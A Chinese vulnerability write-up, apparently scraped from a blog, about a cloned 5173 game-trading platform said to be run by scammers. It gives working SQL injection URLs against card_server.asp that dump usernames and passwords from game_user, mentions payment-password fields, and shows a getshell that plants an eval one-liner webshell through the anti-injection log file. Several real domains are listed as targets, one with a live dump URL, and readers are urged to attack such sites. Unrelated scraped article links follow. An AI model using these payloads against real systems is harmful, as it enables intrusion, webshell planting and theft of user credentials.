最近没事登登好几年前玩过的游戏看看,发现有人喊高价收号,这一看就是骗子,这等骗子还想骗我?我就来看看这逗逼是怎么骗人的,结果发现这人给了一个说是 5173平台交易的网站,叫我直接把号的信息填上去然后填好了之后就去他就会去购买,然后仔细看了一下平台,获取了源代码后看了一下~呵呵,漏洞还是有不 少的~ 仿5173网游交易平台游戏交易平台存在注入与getshell漏洞,可直接拖掉玩家数据~
    发乌云上乌云不收,所以没事就发zone里给大家玩玩。其实这系统还是蛮多漏洞的,我最痛恨骗子了,大家能搞几个骗子平台就搞几个去吧~案例上大多都是一些骗子搭建来钓鱼的。

A:SQL注入一:

漏洞文件:/help.asp

<!--#include file="conn.asp"-->

<!--#include file="inc/config.asp"-->

<%

  if trim(request("id")) <> "" then

  set rs=conn.execute("select * from help where id ="&trim(request("id"))&" order by paixu asc")

  if not rs.eof then

  title=rs("help_title")

  content=rs("help_content")

  end if

  else

  set rs=conn.execute("select top 1 * from help order by paixu asc")

    if not rs.eof then

  title=rs("help_title")

  content=rs("help_content")

  end if

  end if%>

这里id参数过滤不严存在sql注入的,但是conn.asp中包含了:

<!--#include file="sqlin.asp"-->都知道这个防注入文件很垃圾吧,只做了GET和POST的防注入,可直接转为cookie注入绕过

这个注入我就不多研究了,看下一个支持UNION query的注入点。

B:SQL注入二

漏洞文件:/card_server.asp

<%

function OpenDB(sdbname)

{

/*

*--------------- OpenDB(sdbname) -----------------

* OpenDB(sdbname)

* 功能:打开数据库sdbname,返回conn对象.

* 参数:sdbname,字符串,数据库名称.

* 实例:var conn = OpenDB("database.mdb");

*--------------- OpenDB(sdbname) -----------------

*/

/*var connstr = "driver={SQL Server};server=.;uid=sa;pwd=7881541;database=wangyou";*/

var connstr = "Provider=Microsoft.Jet.OLEDB.4.0; Data Source="+Server.MapPath(sdbname);

var conn = Server.CreateObject("ADODB.Connection");

conn.Open(connstr);

return conn;

}

var oConn = OpenDB("HSGAMEDB/#HSgame201008041121.asp");

var sel = Request("sel");

var classid = Request("classid")

var fieldname = Request("fieldname")

var arrResult = new Array();

//var sql = "select "+fieldname+" from game_class where parentid='"+sel+"' and classid="+classid;

var sql = "select * from card_class where parentid="+sel+"";

//Response.Write("alert("+sql+")")

var rs0 = Server.CreateObject("ADODB.Recordset");

rs0.Open(sql,oConn,1,1);

while(!rs0.EOF)

{

//遍历所有适合的数据放入arrResult数组中.

arrResult[arrResult.length] = rs0(0).Value+"|"+rs0(1).Value;

rs0.MoveNext();

}

//escape解决了XMLHTTP。中文处理的问题.

//数组组合成字符串.由","字符串连接.

Response.Write(escape(arrResult.join(",")));

%>

这里没有直接包含数据库连接文件,直接创建了连接对象,导致这一个注入是无法被sqlin.asp防御,注意,Request的sel参数没有过滤直接带入查询导致了SQL注入。简单构造一下注入点:

http://127.0.0.1/card_server.asp?sel=1'

Microsoft JET Database Engine 错误 '80040e14'

字符串的语法错误 在查询表达式 'parentid=1'' 中。

/card_server.asp,行 28



支持联合查询,可直脱掉ganme_user的玩家数据,好像sqlmap没有game_user的字典吧?。还有一个字段"alipay_pwd"是用户的支付密码~

http://127.0.0.1/card_server.asp?sel=1%20union%20select%20user_name,login_pwd,3,4,5,6,7,8,9%20from%20game_user



由于通用型的要5个案例,那我就来五个~

http://hhgg88.com/card_server.asp?sel=1

http://www.loft98.com.cn/card_server.asp?sel=1

http://mosouu.com/card_server.asp?sel=1

http://gaoyi.cc/card_server.asp?sel=1

http://www.631hk.com/card_server.asp?sel=1

我来脱个裤子给大家看看:

http://www.tylsf.com.cn/card_server.asp?sel=1%20union%20select%20user_name,login_pwd,3,4,5,6,7,8,9%20from%20game_user

C:GETSHELL:

漏洞文件:/SqlIn.Asp

<%

'--------数据库连接部分--------------

'dim dbkillSql,killSqlconn,connkillSql

dbkillSql="sql_whelpu.asp"

'On Error Resume Next

Set killSqlconn = Server.CreateObject("ADODB.Connection")

connkillSql="Provider=Microsoft.Jet.OLEDB.4.0;Data Source=" & Server.MapPath(dbkillSql)

killSqlconn.Open connkillSql

If Err Then

  err.Clear

  Set killSqlconn = Nothing

  Response.Write "数据库连接出错,请检查连接字串。"

  Response.End

End If

'--------定义部份------------------

'Dim Fy_Post,Fy_Get,Fy_In,Fy_Inf,Fy_Xh,Fy_db,Fy_dbstr,Kill_IP,WriteSql

'自定义需要过滤的字串,用 "|" 分隔

Fy_In = "'|;|and|exec|insert|select|delete|update|count|*|%|chr|mid|master|truncate|char|declare"

Kill_IP=True

WriteSql=True      

'----------------------------------

Fy_Inf = split(Fy_In,"|")

'--------POST部份------------------

If Request.Form<>"" Then

  For Each Fy_Post In Request.Form

    For Fy_Xh=0 To Ubound(Fy_Inf)

      If Instr(LCase(Request.Form(Fy_Post)),Fy_Inf(Fy_Xh))<>0 Then

        If WriteSql=True Then

          killSqlconn.Execute("insert into
SqlIn(Sqlin_IP,SqlIn_Web,SqlIn_FS,SqlIn_CS,SqlIn_SJ)
values('"&Request.ServerVariables("REMOTE_ADDR")&"','"&Request.ServerVariables("URL")&"','POST','"&Fy_Post&"','"&replace(Request.Form(Fy_Post),"'","''")&"')")

          killSqlconn.close

          Set killSqlconn = Nothing

        End If

        Response.Write "<Script Language=JavaScript>alert('系统提示:108非法操作!');</Script>"

        Response.Write "非法操作!系统做了如下记录↓<br>"

        Response.Write "操作IP:"&Request.ServerVariables("REMOTE_ADDR")&"<br>"

        Response.Write "操作时间:"&Now&"<br>"

        Response.Write "操作页面:"&Request.ServerVariables("URL")&"<br>"

        Response.Write "提交方式:POST<br>"

        Response.Write "提交参数:"&Fy_Post&"<br>"

        Response.Write "提交数据:"&Request.Form(Fy_Post)

        Response.Redirect("default.asp")

        Response.End

      End If

    Next

  Next

End If

'----------------------------------

'--------GET部份-------------------

If Request.QueryString<>"" Then

  For Each Fy_Get In Request.QueryString

    For Fy_Xh=0 To Ubound(Fy_Inf)

      If Instr(LCase(Request.QueryString(Fy_Get)),Fy_Inf(Fy_Xh))<>0 Then

        If WriteSql=True Then

          killSqlconn.Execute("insert into
SqlIn(Sqlin_IP,SqlIn_Web,SqlIn_FS,SqlIn_CS,SqlIn_SJ)
values('"&Request.ServerVariables("REMOTE_ADDR")&"','"&Request.ServerVariables("URL")&"','GET','"&Fy_Get&"','"&replace(Request.QueryString(Fy_Get),"'","''")&"')")

        killSqlconn.close

        Set killSqlconn = Nothing

        End If

        Response.Write "<Script Language=JavaScript>alert('系统提示:108非法操作!');</Script>"

        Response.Write "非法操作!系统做了如下记录↓<br>"

        Response.Write "操作IP:"&Request.ServerVariables("REMOTE_ADDR")&"<br>"

        Response.Write "操作时间:"&Now&"<br>"

        Response.Write "操作页面:"&Request.ServerVariables("URL")&"<br>"

        Response.Write "提交方式:GET<br>"

        Response.Write "提交参数:"&Fy_Get&"<br>"

        Response.Write "提交数据:"&Request.QueryString(Fy_Get)

        Response.Redirect("default.asp")

        Response.End

      End If

    Next

  Next

End If

%>

这里直接将用户非法提交的字符串写入了sql_whelpu.asp的数据库里面了,试想一下,如果故意加入一句话不就可以GETSHELL了吗? 在没有被人插入过asp的<%%>符号则可直接访问:

http://127.0.0.1/list_buy.asp?class_1=35536%20%3C%eval%20request(1)%%3E

当然如果有被人提交过的需要注意闭合就可以获取webshell了~ 这里成功将一句话写入数据库:sql_whelpu.asp,我们打开看看是不是呢?

菜刀连接:

http://127.0.0.1/sql_whelpu.asp

仿5173游戏交易平台系统SQL注入(可直接脱裤)+Getshell的更多相关文章

  1. 网页闯关游戏(riddle webgame)--SQL注入的潘多拉魔盒

    前言: 之前编写了一个网页闯关游戏(类似Riddle Game), 除了希望大家能够体验一下我的游戏外. 也愿意分享编写这个网页游戏过程中, 学到的一些知识. web开发初学者往往会忽视一些常见的漏洞 ...

  2. Collabtive 系统 SQL 注入实验(补充)

    SQL Injection:就是通过把SQL命令插入到Web表单递交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令. 具体来说,它是利用现有应用程序,将(恶意)的SQL命令注 ...

  3. 某PHP发卡系统SQL注入

    源码出自:https://www.0766city.com/yuanma/11217.html 安装好是这样的 审计 发现一处疑似注入的文件 地址:/other/submit.php 看到这个有个带入 ...

  4. Sql注入基础原理介绍

    说明:文章所有内容均截选自实验楼教程[Sql注入基础原理介绍]~ 实验原理 Sql 注入攻击是通过将恶意的 Sql 查询或添加语句插入到应用的输入参数中,再在后台 Sql 服务器上解析执行进行的攻击, ...

  5. zabbix再爆高危SQL注入漏洞,可获系统权限

    漏洞概述 zabbix是一个开源的企业级性能监控解决方案.近日,zabbix的jsrpc的profileIdx2参数存在insert方式的SQL注入漏洞,攻击者无需授权登陆即可登陆zabbix管理系统 ...

  6. DM企业建站系统v201710 sql注入漏洞分析 | 新版v201712依旧存在sql注入

    0x00 前言 本来呢,这套CMS都不想审的了.下载下来打开一看,各种debug注释,排版烂的不行. 贴几个页面看看 感觉像是新手练手的,没有审下去的欲望了. 但想了想,我tm就是新手啊,然后就继续看 ...

  7. [代码审计]某租车系统JAVA代码审计[前台sql注入]

    0x00 前言 艰难徘徊这么久,终于迈出第一步,畏畏缩缩是阻碍大多数人前进的绊脚石,共勉. 系统是租车系统,这个系统是Adog师傅之前发在freebuf(http://www.freebuf.com/ ...

  8. 仿sql注入 sql

    <?phpclass sqlsafe { //(and|or)\\b 表示以and和or结尾的单词如:aand,band,都可以匹配//如果匹配and或or则使用 \\b(and|or)\\b来 ...

  9. [代码审计]DM企业建站系统v201710 sql注入漏洞分析 | 新版v201712依旧存在sql注入

    0x00 前言 本来呢,这套CMS都不想审的了.下载下来打开一看,各种debug注释,排版烂的不行. 贴几个页面看看 感觉像是新手练手的,没有审下去的欲望了. 但想了想,我tm就是新手啊,然后就继续看 ...

随机推荐

  1. 2013 ACM/ICPC 长沙网络赛J题

    题意:一个数列,给出这个数列中的某些位置的数,给出所有相邻的三个数字的和,数列头和尾处给出相邻两个数字的和.有若干次询问,每次问某一位置的数字的最大值. 分析:设数列为a1-an.首先通过相邻三个数字 ...

  2. Android 中的Force Close

    今天写程序时遇到一个问题,领导希望在点击了setting里的force close 后,程序依然能够响应以前用alarmManager注册的receiver. 在网上看到了一些文章,写的是如何建立一个 ...

  3. Python多进程(1)——subprocess与Popen()

    Python多进程方面涉及的模块主要包括: subprocess:可以在当前程序中执行其他程序或命令: mmap:提供一种基于内存的进程间通信机制: multiprocessing:提供支持多处理器技 ...

  4. 10.python之socket和socketserver

    1.socket介绍 socket的英文原义是"孔"或"插座".作为BSD UNIX的进程通信机制,取后一种意思.通常也 称作"套接字",用 ...

  5. Heap:左式堆的应用例(任意序列变单调性最小价值)

    首先来说一下什么是左式堆: A:左式堆是专门用来解优先队列合并的麻烦(任意二叉堆的合并都必须重新合并,O(N)的时间). 左式堆的性质: 1.定义零路经长:节点从没有两个两个儿子节点的路经长,把NUL ...

  6. SQL with as

    姓名 课程 分数 张三 语文 张三 数学 张三 物理 李四 语文 李四 数学 李四 物理 先看下面一个嵌套的查询语句 ) 上面的查询语句使用了一个子查询.虽然这条SQL语句并不复杂,但如果嵌套的层次过 ...

  7. jquery easy ui 1.3.4 内容组件(2)

    2.1.panel(面板) panel面板是easyui里面非常基础的一个内容组件,在我们后期学的tabs (选项卡).accordion(手风琴)这两种内容组件都依赖于panel组件.构建一个pan ...

  8. Java Hour 48 Servlet 简介

    搞Java Web 开发,绕不开的就是Servlet 了.传说Servlet 是一种比JSP 更加古董的动态网页编程技术.在没有JSP 之前,Servlet 同时充当了展现层,业务逻辑层和持久层. 这 ...

  9. poj 3468 成段增减

    Sample Input 10 5 1 2 3 4 5 6 7 8 9 10 Q 4 4 Q 1 10 Q 2 4 C 3 6 3 Q 2 4 Sample Output 4 55 9 15 #inc ...

  10. gui_mainfcn(gui_State, varargin{:});是什么意思

    gui_mainfcn函数执行过程中,要调用各个控件的CreateFcn函数(也就是控件创建的函数)来创建控件.如果对控件的一些属性设置不对,则控件就没法创建,gui_mainfcn函数就不能正确执行 ...